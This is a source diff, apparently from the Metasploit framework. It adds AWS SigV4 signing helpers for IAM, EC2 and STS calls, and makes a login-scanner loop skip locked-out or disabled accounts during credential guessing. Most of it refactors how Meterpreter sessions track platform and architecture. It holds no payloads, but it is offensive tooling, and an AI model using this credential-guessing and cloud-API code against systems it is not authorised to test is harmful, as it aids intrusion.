+
+        def hexhmac(key, value)
+          if key.nil? || !key.instance_of?(String) || value.nil? || !value.instance_of?(String)
+            print_error "Unexpected key/value format"
+            return nil
+          end
+          OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('sha256'), key, value)
+        end
+
+        def request_to_sign(headers, body_digest)
+          if headers.nil? || !headers.instance_of?(Hash) || body_digest.nil? || !body_digest.instance_of?(String)
+            return nil, nil
+          end
+          headers_block = headers.sort_by(&:first).map do |k, v|
+            v = "#{v},#{v}" if k == 'Host'
+            "#{k.downcase}:#{v}"
+          end.join("\n")
+          headers_list = headers.keys.sort.map(&:downcase).join(';')
+          flat_request = [ "POST", "/", '', headers_block + "\n", headers_list, body_digest].join("\n")
+          [headers_list, flat_request]
+        end
+
+        def sign(creds, service, headers, body_digest, now)
+          date_mac = hmac("AWS4" + creds.fetch('SecretAccessKey'), now[0, 8])
+          region_mac = hmac(date_mac, datastore['Region'])
+          service_mac = hmac(region_mac, service)
+          credentials_mac = hmac(service_mac, 'aws4_request')
+          headers_list, flat_request = request_to_sign(headers, body_digest)
+          doc = "AWS4-HMAC-SHA256\n#{now}\n#{now[0, 8]}/#{datastore['Region']}/#{service}/aws4_request\n#{hexdigest(flat_request)}"
+
+          signature = hexhmac(credentials_mac, doc)
+          [headers_list, signature]
+        end
+
+        def auth(creds, service, headers, body_digest, now)
+          headers_list, signature = sign(creds, service, headers, body_digest, now)
+          "AWS4-HMAC-SHA256 Credential=#{creds.fetch('AccessKeyId')}/#{now[0, 8]}/#{datastore['Region']}/#{service}/aws4_request, SignedHeaders=#{headers_list}, Signature=#{signature}"
+        end
+
+        def body(vars_post)
+          pstr = ""
+          vars_post.each_pair do |var, val|
+            pstr << '&' unless pstr.empty?
+            pstr << var
+            pstr << '='
+            pstr << val
+          end
+          pstr
+        end
+
+        def headers(creds, service, body_digest, now = nil)
+          now = Time.now.utc.strftime("%Y%m%dT%H%M%SZ") if now.nil?
+          headers = {
+            'Content-Type' => 'application/x-www-form-urlencoded; charset=utf-8',
+            'Accept-Encoding' => '',
+            'User-Agent' => USER_AGENT,
+            'X-Amz-Date' => now,
+            'Host' => datastore['RHOST'],
+            'X-Amz-Content-Sha256' => body_digest,
+            'Accept' => '*/*'
+          }
+          headers['X-Amz-Security-Token'] = creds['Token'] if creds['Token']
+          sign_headers = ['Content-Type', 'Host', 'User-Agent', 'X-Amz-Content-Sha256', 'X-Amz-Date']
+          auth_headers = headers.select { |k, _| sign_headers.include?(k) }
+          headers['Authorization'] = auth(creds, service, auth_headers, body_digest, now)
+          headers
+        end
+
+        def print_hsh(hsh)
+          return if hsh.nil? || !hsh.instance_of?(Hash)
+          hsh.each do |key, value|
+            vprint_status "#{key}: #{value}"
+          end
+        end
+
+        def print_results(doc, action)
+          response = "#{action}Response"
+          result = "#{action}Result"
+          resource = /[A-Z][a-z]+([A-Za-z]+)/.match(action)[1]
+
+          if doc["ErrorResponse"] && doc["ErrorResponse"]["Error"]
+            print_error doc["ErrorResponse"]["Error"]["Message"]
+            return nil
+          end
+
+          idoc = doc.fetch(response)
+          if idoc.nil? || !idoc.instance_of?(Hash)
+            print_error "Unexpected response structure"
+            return {}
+          end
+          idoc = idoc[result] if idoc[result]
+          idoc = idoc[resource] if idoc[resource]
+
+          if idoc["member"]
+            idoc["member"].each do |x|
+              print_hsh x
+            end
+          else
+            print_hsh idoc
+          end
+          idoc
+        end
+
+        def call_api(creds, service, api_params)
+          vprint_status("Connecting (#{datastore['RHOST']})...")
+          body = body(api_params)
+          body_length = body.length
+          body_digest = hexdigest(body)
+          begin
+            res = send_request_raw(
+              'method' => 'POST',
+              'data' => body,
+              'headers' => headers(creds, service, body_digest)
+            )
+            if res.nil?
+              print_error "#{peer} did not respond"
+            else
+              Hash.from_xml(res.body)
+            end
+          rescue => e
+            print_error e.message
+          end
+        end
+
+        def call_iam(creds, api_params)
+          api_params['Version'] = '2010-05-08' unless api_params['Version']
+          call_api(creds, 'iam', api_params)
+        end
+
+        def call_ec2(creds, api_params)
+          api_params['Version'] = '2015-10-01' unless api_params['Version']
+          call_api(creds, 'ec2', api_params)
+        end
+
+        def call_sts(creds, api_params)
+          api_params['Version'] = '2011-06-15' unless api_params['Version']
+          call_api(creds, 'sts', api_params)
+        end
+      end
+    end
+  end
+end
@@ -199,6 +199,7 @@ module Metasploit
            total_error_count = 0

            successful_users = Set.new
+            ignored_users = Set.new
            first_attempt = true

            each_credential do |credential|
@@ -213,6 +214,14 @@ module Metasploit
                next
              end

+              # Users that went into the lock-out list
+              if ignored_users.include?(credential.public)
+                if credential.parent.respond_to?(:skipped)
+                  credential.parent.skipped = true
+                end
+                next
+              end
+
              if first_attempt
                first_attempt = false
              else
@@ -228,6 +237,10 @@ module Metasploit
                consecutive_error_count = 0
                successful_users << credential.public
                break if stop_on_success
+              elsif result.status == Metasploit::Model::Login::Status::LOCKED_OUT
+                ignored_users << credential.public
+              elsif result.status == Metasploit::Model::Login::Status::DISABLED
+                ignored_users << credential.public
              else
                if result.status == Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
                  consecutive_error_count += 1
@@ -203,6 +203,8 @@ module Metasploit
            status = case e.get_error(e.error_code)
                     when *StatusCodes::CORRECT_CREDENTIAL_STATUS_CODES
                       Metasploit::Model::Login::Status::DENIED_ACCESS
+                     when 'STATUS_ACCOUNT_LOCKED_OUT'
+                       Metasploit::Model::Login::Status::LOCKED_OUT
                     when 'STATUS_LOGON_FAILURE', 'STATUS_ACCESS_DENIED'
                       Metasploit::Model::Login::Status::INCORRECT
                     else
@@ -133,6 +133,8 @@ module Metasploit
          @parent.print_error(message)
        end

+        alias_method :print_bad, :print_error
+
      end
    end
  end
@@ -51,8 +51,9 @@ class TDSSSLProxy
  def setup_ssl
    @running = true
    @t1 = Thread.start { ssl_setup_thread }
-    ssl_context = OpenSSL::SSL::SSLContext.new(:TLSv1)
-    @ssl_socket = OpenSSL::SSL::SSLSocket.new(@s1, ssl_context)
+    ctx = OpenSSL::SSL::SSLContext.new(:SSLv23)
+    ctx.ciphers = "ALL:!ADH:!EXPORT:!SSLv2:!SSLv3:+HIGH:+MEDIUM"
+    @ssl_socket = OpenSSL::SSL::SSLSocket.new(@s1, ctx)
    @ssl_socket.connect
  end

@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "4.12.30"
+      VERSION = "4.13.11"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -546,7 +546,11 @@ class ReadableText
      row = []
      row << session.sid.to_s
      row << session.type.to_s
-      row[-1] << (" " + session.platform) if session.respond_to?(:platform)
+      if session.respond_to?(:session_type)
+        row[-1] << (" " + session.session_type)
+      elsif session.respond_to?(:platform)
+        row[-1] << (" " + session.platform)
+      end

      if show_extended
        if session.respond_to?(:last_checkin) && session.last_checkin
@@ -670,6 +674,7 @@ class ReadableText
      row[1] = framework.jobs[job_id].name

      pinst = exploit_mod.respond_to?(:payload_instance) ? exploit_mod.payload_instance : nil
+      payload_uri = ''

      if pinst.nil?
        row[2] = ""
@@ -678,7 +683,8 @@ class ReadableText
        row[2] = pinst.refname
        row[3] = ""
        if pinst.respond_to?(:payload_uri)
-          row[3] << pinst.payload_uri
+          payload_uri = pinst.payload_uri.strip
+          row[3] << payload_uri
        end
        if pinst.respond_to?(:luri)
          row[3] << pinst.luri
@@ -690,7 +696,12 @@ class ReadableText
        uripath ||= exploit_mod.datastore['URIPATH']
        row[4] = uripath
        row[5] = framework.jobs[job_id].start_time
-        row[6] = pinst.respond_to?(:listener_uri) ? pinst.listener_uri : ""
+        row[6] = ''
+
+        if pinst.respond_to?(:listener_uri)
+          listener_uri = pinst.listener_uri.strip
+          row[6] = listener_uri unless listener_uri == payload_uri
+        end
      end
      tbl << row
    end
@@ -34,7 +34,15 @@ module CommandShellOptions
    if self.platform and self.platform.kind_of? Msf::Module::Platform
      session.platform = self.platform.realname.downcase
    end
-    session.arch     = self.arch if self.arch
+
+    if self.arch
+      if self.arch.kind_of?(Array)
+        session.arch = self.arch.join('')
+      else
+        session.arch = self.arch
+      end
+    end
+
  end

 end
@@ -32,8 +32,8 @@ class MainframeShell < Msf::Sessions::CommandShell
  # initialize as mf shell session
  #
  def initialize(*args)
-    self.platform = "mainframe"
-    self.arch = "zarch"
+    self.platform = 'mainframe'
+    self.arch = ARCH_ZARCH
    self.translate_1047 = true
    super
  end
@@ -284,7 +284,7 @@ class Meterpreter < Rex::Post::Meterpreter::Client
  #
  # Load the stdapi extension.
  #
-  def load_stdapi()
+  def load_stdapi
    original = console.disable_output
    console.disable_output = true
    console.run_single('load stdapi')
@@ -294,9 +294,8 @@ class Meterpreter < Rex::Post::Meterpreter::Client
  #
  # Load the priv extension.
  #
-  def load_priv()
+  def load_priv
    original = console.disable_output
-
    console.disable_output = true
    console.run_single('load priv')
    console.disable_output = original
@@ -310,7 +309,6 @@ class Meterpreter < Rex::Post::Meterpreter::Client

    begin
      self.machine_id = self.core.machine_id(timeout)
-      self.payload_uuid ||= self.core.uuid(timeout)

      return true
    rescue ::Rex::Post::Meterpreter::RequestError
@@ -325,41 +323,18 @@ class Meterpreter < Rex::Post::Meterpreter::Client
  def update_session_info
    username = self.sys.config.getuid
    sysinfo  = self.sys.config.sysinfo
-    tuple = self.platform.split('/')

-    #
-    # Windows meterpreter currently needs 'win32' or 'win64' to be in the
-    # second half of the platform tuple, in order for various modules and
-    # library code match on that specific string.
-    #
-    if self.platform !~ /win32|win64/
-
-      platform = case self.sys.config.sysinfo['OS']
-        when /windows/i
-          Msf::Module::Platform::Windows
-        when /darwin/i
-          Msf::Module::Platform::OSX
-        when /freebsd/i
-          Msf::Module::Platform::FreeBSD
-        when /netbsd/i
-          Msf::Module::Platform::NetBSD
-        when /openbsd/i
-          Msf::Module::Platform::OpenBSD
-        when /sunos/i
-          Msf::Module::Platform::Solaris
-        when /android/i
-          Msf::Module::Platform::Android
-        else
-          Msf::Module::Platform::Linux
-      end.realname.downcase
-
-      #
-      # This normalizes the platform from 'python/python' to 'python/linux'
-      #
-      self.platform = "#{tuple[0]}/#{platform}"
+    # when updating session information, we need to make sure we update the platform
+    # in the UUID to match what the target is actually running on, but only for a
+    # subset of platforms.
+    if ['java', 'python', 'php'].include?(self.platform)
+      new_platform = guess_target_platform(sysinfo['OS'])
+      if self.platform != new_platform
+        self.payload_uuid.platform = new_platform
+        self.core.set_uuid(self.payload_uuid)
+      end
    end

-
    safe_info = "#{username} @ #{sysinfo['Computer']}"
    safe_info.force_encoding("ASCII-8BIT") if safe_info.respond_to?(:force_encoding)
    # Should probably be using Rex::Text.ascii_safe_hex but leave
@@ -369,6 +344,24 @@ class Meterpreter < Rex::Post::Meterpreter::Client
    self.info = safe_info
  end

+  def guess_target_platform(os)
+    case os
+    when /windows/i
+      Msf::Module::Platform::Windows.realname.downcase
+    when /darwin/i
+      Msf::Module::Platform::OSX.realname.downcase
+    when /mac os ?x/i
+      # this happens with java on OSX (for real!)
+      Msf::Module::Platform::OSX.realname.downcase
+    when /freebsd/i
+      Msf::Module::Platform::FreeBSD.realname.downcase
+    when /openbsd/i, /netbsd/i
+      Msf::Module::Platform::BSD.realname.downcase
+    else
+      Msf::Module::Platform::Linux.realname.downcase
+    end
+  end
+
  #
  # Populate the session information.
  #
@@ -493,11 +486,6 @@ class Meterpreter < Rex::Post::Meterpreter::Client

    sock = net.socket.create(param)

-    # sf: unsure if we should raise an exception or just return nil. returning nil for now.
-    #if( sock == nil )
-    #  raise Rex::UnsupportedProtocol.new(param.proto), caller
-    #end
-
    # Notify now that we've created the socket
    notify_socket_created(self, sock, param)

@@ -505,8 +493,72 @@ class Meterpreter < Rex::Post::Meterpreter::Client
    sock
  end

-  attr_accessor :platform
-  attr_accessor :binary_suffix
+  #
+  # Get a string representation of the current session platform
+  #
+  def platform
+    if self.payload_uuid
+      # return the actual platform of the current session if it's there
+      self.payload_uuid.platform
+    else
+      # otherwise just use the base for the session type tied to this handler.
+      # If we don't do this, storage of sessions in the DB dies
+      self.base_platform
+    end
+  end
+
+  #
+  # Get a string representation of the current session architecture
+  #
+  def arch
+    if self.payload_uuid
+      # return the actual arch of the current session if it's there
+      self.payload_uuid.arch
+    else
+      # otherwise just use the base for the session type tied to this handler.
+      # If we don't do this, storage of sessions in the DB dies
+      self.base_arch
+    end
+  end
+
+  #
+  # Generate a binary suffix based on arch
+  #
+  def binary_suffix
+    # generate a file/binary suffix based on the current arch and platform.
+    # Platform-agnostic archs go first
+    case self.arch
+    when 'java'
+      'jar'
+    when 'php'
+      'php'
+    when 'python'
+      'py'
+    else
+      # otherwise we fall back to the platform
+      case self.platform
+      when 'windows'
+        "#{self.arch}.dll"
+      when 'linux' , 'aix' , 'hpux' , 'irix' , 'unix'
+        'lso'
+      when 'android', 'java'
+        'jar'
+      when 'php'
+        'php'
+      when 'python'
+        'py'
+      else
+        nil
+      end
+    end
+  end
+
+  # These are the base arch/platform for the original payload, required for when the
+  # session is first created thanks to the fact that the DB session recording
+  # happens before the session is even established.
+  attr_accessor :base_arch
+  attr_accessor :base_platform
+
  attr_accessor :console # :nodoc:
  attr_accessor :skip_ssl
  attr_accessor :skip_cleanup
@@ -0,0 +1,30 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_aarch64_Linux < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_AARCH64
+  end
+end
+
+end
+end
+
+
@@ -16,7 +16,8 @@ class Meterpreter_Java_Android < Msf::Sessions::Meterpreter_Java_Java

  def initialize(rstream, opts={})
    super
-    self.platform = 'java/android'
+    self.base_platform = 'android'
+    self.base_arch = ARCH_JAVA
  end

  def load_android
@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_armbe_Linux < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_ARMBE
+  end
+end
+
+end
+end
+
@@ -19,8 +19,8 @@ class Meterpreter_armle_Linux < Msf::Sessions::Meterpreter
  end
  def initialize(rstream, opts={})
    super
-    self.platform      = 'armle/linux'
-    self.binary_suffix = 'lso'
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_ARMLE
  end
 end

@@ -19,8 +19,8 @@ class Meterpreter_Java_Java < Msf::Sessions::Meterpreter
  end
  def initialize(rstream, opts={})
    super
-    self.platform      = 'java/java'
-    self.binary_suffix = 'jar'
+    self.base_platform = 'java'
+    self.base_arch = ARCH_JAVA
  end
 end

@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_mips64_Linux < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_MIPS64
+  end
+end
+
+end
+end
+
@@ -19,8 +19,8 @@ class Meterpreter_mipsbe_Linux < Msf::Sessions::Meterpreter
  end
  def initialize(rstream, opts={})
    super
-    self.platform      = 'mipsbe/linux'
-    self.binary_suffix = 'lso'
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_MIPSBE
  end
 end

@@ -19,8 +19,8 @@ class Meterpreter_mipsle_Linux < Msf::Sessions::Meterpreter
  end
  def initialize(rstream, opts={})
    super
-    self.platform      = 'mipsle/linux'
-    self.binary_suffix = 'lso'
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_MIPSLE
  end
 end

@@ -0,0 +1,50 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-independent meterpreter session type
+#
+###
+class Meterpreter_Multi < Msf::Sessions::Meterpreter
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'multi'
+    self.base_arch = ARCH_ANY
+  end
+
+  def self.create_session(rstream, opts={})
+    # TODO: fill in more cases here
+    case opts[:payload_uuid].platform
+    when 'python'
+      require 'msf/base/sessions/meterpreter_python'
+      return Msf::Sessions::Meterpreter_Python_Python.new(rstream, opts)
+    when 'java'
+      require 'msf/base/sessions/meterpreter_java'
+      return Msf::Sessions::Meterpreter_Java_Java.new(rstream, opts)
+    when 'android'
+      require 'msf/base/sessions/meterpreter_android'
+      return Msf::Sessions::Meterpreter_Java_Android.new(rstream, opts)
+    when 'php'
+      require 'msf/base/sessions/meterpreter_php'
+      return Msf::Sessions::Meterpreter_Php_Java.new(rstream, opts)
+    when 'windows'
+      if opts[:payload_uuid].arch == ARCH_X86
+        require 'msf/base/sessions/meterpreter_x86_win'
+        return Msf::Sessions::Meterpreter_x86_Win.new(rstream, opts)
+      end
+      require 'msf/base/sessions/meterpreter_x64_win'
+      return Msf::Sessions::Meterpreter_x64_Win.new(rstream, opts)
+    end
+
+    # TODO: what should we do when we get here?
+  end
+end
+
+end
+end
+
@@ -60,15 +60,14 @@ module MeterpreterOptions
          session.load_session_info
        end

-        if session.platform =~ /win32|win64/i
+        # only load priv on native windows
+        if session.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(session.arch)
          session.load_priv rescue nil
        end
      end

-      if session.platform =~ /android/i
-        if datastore['AutoLoadAndroid']
-          session.load_android
-        end
+      if session.platform == 'android'
+        session.load_android
      end

      [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|
@@ -19,8 +19,8 @@ class Meterpreter_Php_Php < Msf::Sessions::Meterpreter
  end
  def initialize(rstream, opts={})
    super
-    self.platform      = 'php/php'
-    self.binary_suffix = 'php'
+    self.base_platform = 'php'
+    self.base_arch = ARCH_PHP
  end
 end

@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_ppc64le_Linux < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_PPC64LE
+  end
+end
+
+end
+end
+
@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_ppc_Linux < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_PPC
+  end
+end
+
+end
+end
+
@@ -86,8 +86,8 @@ class Meterpreter_Python_Python < Msf::Sessions::Meterpreter

  def initialize(rstream, opts={})
    super
-    self.platform      = 'python/python'
-    self.binary_suffix = 'py'
+    self.base_platform = 'python'
+    self.base_arch = ARCH_PYTHON
  end

  def lookup_error(error_code)
@@ -116,5 +116,6 @@ class Meterpreter_Python_Python < Msf::Sessions::Meterpreter
    false
  end
 end
+
 end
 end
@@ -19,8 +19,8 @@ class Meterpreter_x64_Mettle_Linux < Msf::Sessions::Meterpreter
  end
  def initialize(rstream, opts={})
    super
-    self.platform      = 'x64/linux'
-    self.binary_suffix = 'lso'
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_X64
  end
 end

@@ -14,8 +14,8 @@ module Sessions
 class Meterpreter_x64_Win < Msf::Sessions::Meterpreter
  def initialize(rstream, opts={})
    super
-    self.platform      = 'x64/win64'
-    self.binary_suffix = 'x64.dll'
+    self.base_platform = 'windows'
+    self.base_arch = ARCH_X64
  end

  def lookup_error(code)
@@ -13,8 +13,8 @@ module Sessions
 class Meterpreter_x86_BSD < Msf::Sessions::Meterpreter
  def initialize(rstream, opts={})
    super
-    self.platform      = 'x86/bsd'
-    self.binary_suffix = 'bso'
+    self.base_platform = 'bsd'
+    self.base_arch = ARCH_X86
  end
 end

@@ -13,8 +13,8 @@ module Sessions
 class Meterpreter_x86_Linux < Msf::Sessions::Meterpreter
  def initialize(rstream, opts={})
    super
-    self.platform      = 'x86/linux'
-    self.binary_suffix = 'lso'
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_X86
  end
 end

@@ -19,8 +19,8 @@ class Meterpreter_x86_Mettle_Linux < Msf::Sessions::Meterpreter
  end
  def initialize(rstream, opts={})
    super
-    self.platform      = 'x86/linux'
-    self.binary_suffix = 'lso'
+    self.base_platform = 'linux'
+    self.base_arch = ARCH_X86
  end
 end

@@ -14,8 +14,8 @@ module Sessions
 class Meterpreter_x86_Win < Msf::Sessions::Meterpreter
  def initialize(rstream,opts={})
    super
-    self.platform      = 'x86/win32'
-    self.binary_suffix = 'x86.dll'
+    self.base_platform = 'windows'
+    self.base_arch = ARCH_X86
  end

  def lookup_error(code)
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .3.1
 .3.3